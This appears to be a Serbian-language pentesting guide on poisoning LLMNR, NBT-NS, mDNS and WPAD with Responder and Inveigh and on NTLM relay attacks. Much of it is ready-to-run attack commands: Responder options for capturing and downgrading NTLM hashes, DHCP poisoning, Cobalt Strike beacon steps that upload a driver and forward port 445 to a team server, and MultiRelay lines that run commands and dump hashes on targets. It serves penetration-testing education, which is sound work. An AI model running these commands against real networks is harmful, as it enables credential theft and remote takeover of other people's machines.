Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Network Protocols

Local Host Resolution Protocols

• LLMNR, NBT-NS, and mDNS:

• Microsoft i drugi operativni sistemi koriste LLMNR i NBT-NS za lokalno rešavanje imena kada DNS zakaže. Slično, Apple i Linux sistemi koriste mDNS.

• Ovi protokoli su podložni presretanju i spoofingu zbog svoje neautentifikovane, broadcast prirode preko UDP-a.

• Responder se može koristiti za impersonaciju usluga slanjem lažnih odgovora hostovima koji postavljaju upite ovim protokolima.

• Dodatne informacije o impersonaciji usluga koristeći Responder mogu se naći ovde.

Web Proxy Auto-Discovery Protocol (WPAD)

• WPAD omogućava pretraživačima da automatski otkriju postavke proxy-a.

• Otkriće se olakšava putem DHCP-a, DNS-a, ili povratka na LLMNR i NBT-NS ako DNS zakaže.

• Responder može automatizovati WPAD napade, usmeravajući klijente ka zlonamernim WPAD serverima.

Responder for Protocol Poisoning

• Responder je alat koji se koristi za trovanje LLMNR, NBT-NS i mDNS upita, selektivno odgovarajući na osnovu tipova upita, prvenstveno cilja SMB usluge.

• Dolazi unapred instaliran u Kali Linux-u, konfigurisanje se vrši na /etc/responder/Responder.conf.

• Responder prikazuje uhvaćene hešove na ekranu i čuva ih u direktorijumu /usr/share/responder/logs.

• Podržava i IPv4 i IPv6.

• Windows verzija Responder-a je dostupna ovde.

Running Responder

• Da biste pokrenuli Responder sa podrazumevanim postavkama: responder -I <Interface>

• Za agresivnije ispitivanje (sa potencijalnim nuspojavama): responder -I <Interface> -P -r -v

• Tehnike za hvatanje NTLMv1 izazova/odgovora radi lakšeg razbijanja: responder -I <Interface> --lm --disable-ess

• WPAD impersonacija može se aktivirati sa: responder -I <Interface> --wpad

• NetBIOS zahtevi mogu se rešiti na IP napadača, a može se postaviti i proxy za autentifikaciju: responder.py -I <interface> -Pv

DHCP Poisoning with Responder

• Spoofing DHCP odgovora može trajno otrovati rutiranje informacija žrtve, nudeći diskretniju alternativu ARP trovanju.

• Zahteva precizno poznavanje konfiguracije ciljne mreže.

• Pokretanje napada: ./Responder.py -I eth0 -Pdv

• Ova metoda može efikasno uhvatiti NTLMv1/2 hešove, ali zahteva pažljivo rukovanje kako bi se izbeglo ometanje mreže.

Capturing Credentials with Responder

• Responder će impersonirati usluge koristeći gore pomenute protokole, hvatajući akreditive (obično NTLMv2 izazov/odgovor) kada korisnik pokuša da se autentifikuje protiv spoofovanih usluga.

• Mogu se pokušati da se pređe na NetNTLMv1 ili onemogući ESS radi lakšeg razbijanja akreditiva.

Važno je napomenuti da se korišćenje ovih tehnika mora vršiti legalno i etički, osiguravajući odgovarajuću autorizaciju i izbegavajući ometanje ili neovlašćen pristup.

Inveigh

Inveigh je alat za penetracione testere i red timere, dizajniran za Windows sisteme. Nudi funkcionalnosti slične Responder-u, obavljajući spoofing i man-in-the-middle napade. Alat se razvio iz PowerShell skripte u C# binarni, sa Inveigh i InveighZero kao glavnim verzijama. Detaljni parametri i uputstva mogu se naći u wiki.

Inveigh se može koristiti kroz PowerShell:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Ili izvršeno kao C# binarni fajl:

Inveigh.exe

NTLM Relay Attack

Ovaj napad koristi SMB autentifikacione sesije za pristup ciljnim mašinama, omogućavajući sistemsku ljusku ako je uspešan. Ključni preduslovi uključuju:

• Autentifikovani korisnik mora imati lokalni administratorski pristup na preusmerenoj host mašini.

• SMB potpisivanje treba biti onemogućeno.

445 Port Forwarding and Tunneling

U scenarijima gde direktno umrežavanje nije izvodljivo, saobraćaj na portu 445 treba preusmeriti i tunelovati. Alati poput PortBender pomažu u preusmeravanju saobraćaja sa porta 445 na drugi port, što je od suštinskog značaja kada je dostupan lokalni administratorski pristup za učitavanje drajvera.

PortBender podešavanje i rad u Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Other Tools for NTLM Relay Attack

• Metasploit: Podesite sa proxy-ima, lokalnim i udaljenim detaljima hosta.

• smbrelayx: Python skripta za preusmeravanje SMB sesija i izvršavanje komandi ili postavljanje backdoor-a.

• MultiRelay: Alat iz Responder paketa za preusmeravanje specifičnih korisnika ili svih korisnika, izvršavanje komandi ili dumpovanje hash-eva.

Each tool can be configured to operate through a SOCKS proxy if necessary, enabling attacks even with indirect network access.

MultiRelay Operation

MultiRelay se izvršava iz /usr/share/responder/tools direktorijuma, ciljajući specifične IP adrese ili korisnike.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Ovi alati i tehnike čine sveobuhvatan skup za sprovođenje NTLM Relay napada u raznim mrežnim okruženjima.

Prisiljavanje NTLM prijava

Na Windows-u možda ćete moći da prisilite neke privilegovane naloge da se autentifikuju na proizvoljnim mašinama. Pročitajte sledeću stranicu da biste saznali kako:

Reference

• https://intrinium.com/smb-relay-attack-tutorial/

• https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/

• https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

• https://intrinium.com/smb-relay-attack-tutorial/

• https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html